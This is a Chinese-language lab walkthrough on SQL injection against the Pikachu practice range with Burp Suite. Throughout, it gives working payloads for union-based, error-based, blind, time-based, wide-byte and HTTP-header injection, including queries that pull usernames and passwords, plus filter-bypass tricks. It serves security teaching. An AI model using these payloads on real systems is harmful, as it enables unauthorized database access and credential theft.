从Pikachu靶场看SQL注入:新手如何用Burp Suite一步步挖出数据库里的秘密
从Pikachu靶场看SQL注入:Burp Suite实战手册
当你在Pikachu靶场中第一次看到那个看似无害的搜索框时,可能不会想到它背后隐藏着整个数据库的钥匙。作为Web安全领域的入门必修课,SQL注入既是检验工具熟练度的试金石,也是理解Web应用安全逻辑的绝佳入口。不同于单纯的理论讲解,本文将带你用Burp Suite这把"手术刀",解剖Pikachu靶场中的各类SQL注入场景,从基础的错误回显到复杂的盲注自动化,逐步构建完整的实战方法论。
1. 环境准备与工具配置
在开始注入实战前,确保你的实验环境已正确搭建。Pikachu靶场作为专为Web安全学习设计的漏洞演练平台,集成了从基础到进阶的各类SQL注入场景。推荐使用以下工具组合:
- Burp Suite Community/Professional:核心测试工具,重点使用Proxy、Repeater和Intruder模块
- 浏览器:Chrome/Firefox配合Burp Suite证书安装
- Pikachu靶场:运行在本地PHP环境(如XAMPP)或Docker容器
提示:Burp Suite的Proxy模块需配置浏览器代理为127.0.0.1:8080,并导入CA证书解决HTTPS拦截问题
关键配置步骤:
# 启动Pikachu Docker容器示例 docker run -d -p 80:80 area39/pikachuBurp Suite工作区建议布局:
- Target:定义测试范围为
http://localhost - Proxy:拦截浏览器请求进行修改
- Repeater:精细调整单个请求参数
- Intruder:自动化参数爆破与模糊测试
2. 基础注入类型实战解析
2.1 数字型注入:从报错到数据提取
在Pikachu的"数字型注入"关卡,通过Burp抓取查询请求:
GET /vul/sqli/sqli_id.php?id=1 HTTP/1.1 Host: localhost探测注入点三步法:
- 添加单引号测试:
id=1'→ 观察是否产生数据库错误 - 逻辑测试:
id=1 and 1=1vsid=1 and 1=2→ 查看返回差异 - 注释测试:
id=1'--→ 验证语句闭合
字段数探测技巧:
GET /vul/sqli/sqli_id.php?id=1 order by 4-- HTTP/1.1逐步增加order by数值,直到页面报错(本例中3为临界值)
联合查询实战:
GET /vul/sqli/sqli_id.php?id=-1 union select 1,database(),version()-- HTTP/1.1关键点:
- 使用负值或不存在ID使union前半部分无返回
- 通过占位数字确定回显位置
2.2 字符型注入:闭合与绕过艺术
字符型注入的核心在于正确处理引号闭合。以Pikachu用户登录为例:
原始请求:
POST /vul/sqli/sqli_str.php HTTP/1.1 username=kobe&password=123456注入payload构造:
username=kobe' and '1'='1等效SQL:
SELECT * FROM users WHERE username='kobe' and '1'='1'信息提取流程:
- 确定字段数:
kobe' order by 2-- - 联合查询:
aaa' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- - 数据获取:
admin' union select null,concat(username,':',password) from users--
3. 高阶注入技术实战
3.1 报错注入:非常规数据提取
当页面不直接显示查询结果但会返回错误信息时,可利用数据库报错机制:
常用报错函数对比:
| 函数 | 语法示例 | 输出特点 |
|---|---|---|
| updatexml | updatexml(1,concat(0x7e,(select user())),1) | 截取32位 |
| extractvalue | extractvalue(1,concat(0x7e,(select user()))) | 截取32位 |
| floor+rand | select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x | 完整输出 |
Pikachu实战payload:
POST /vul/sqli/sqli_reg.php HTTP/1.1 username=test' or updatexml(1,concat(0x7e,(select group_concat(username,':',password) from users)),1) or '&password=1233.2 盲注自动化:Intruder模块妙用
布尔盲注手工测试效率极低,Burp Intruder可实现自动化猜解:
设置步骤:
- 发送基础请求到Intruder
- 选择攻击类型为"Cluster bomb"
- 设置两个payload位置:
- 字符位置:
kobe' and ascii(substr(database(),§1§,1))=§2§-- - Payload 1:数字序列1-20(猜解位置)
- Payload 2:ASCII可打印字符集(32-126)
- 字符位置:
结果过滤技巧:
- 添加Grep-Match规则匹配成功响应特征
- 使用Grep-Extract提取关键数据片段
延时注入自动化:
GET /vul/sqli/sqli_blind_t.php?name=kobe' and if(ascii(substr(database(),1,1))=112,sleep(3),0)-- HTTP/1.1在Intruder中设置响应时间排序,识别成功条件。
4. 防御绕过与特殊场景
4.1 宽字节注入:编码的艺术
当应用使用addslashes等函数转义单引号时,可利用GBK等宽字符集特性:
GET /vul/sqli/sqli_wide.php?name=%df%27%20or%201=1-- HTTP/1.1原理:
- %df与转义符%5c组合成合法汉字
- 单引号成功逃逸
4.2 HTTP头注入:非常规攻击面
Pikachu的"HTTP头注入"关卡演示了如何通过User-Agent等头部字段注入:
GET /vul/sqli/sqli_header/sqli_header_login.php HTTP/1.1 User-Agent: ' or updatexml(1,concat(0x7e,database()),0) or '检测方法:
- 在每个头部字段后添加单引号测试
- 观察错误回显或响应时间变化
5. 实战经验与调试技巧
在数百次测试中,有几个关键点常被新手忽略:
- Content-Type陷阱:POST请求若为application/json,需要修改为application/x-www-form-urlencoded才能正常注入
- 空格过滤绕过:使用注释符/**/或加号+替代空格
GET /vul/sqli/sqli_id.php?id=1/**/union/**/select/**/1,2,3-- - 多语句执行:部分环境需添加
;%00终止前序语句
Burp Suite调试技巧:
- 使用Logger++插件记录所有请求
- 搭配Turbo Intruder处理大量并发测试
- 通过Match and Replace规则自动修改特定参数
在真实测试中,遇到页面无任何变化时,不妨尝试:
- 查看网页源代码中隐藏的注释
- 检查网络请求的响应头信息
- 对比正常/异常请求的响应体大小差异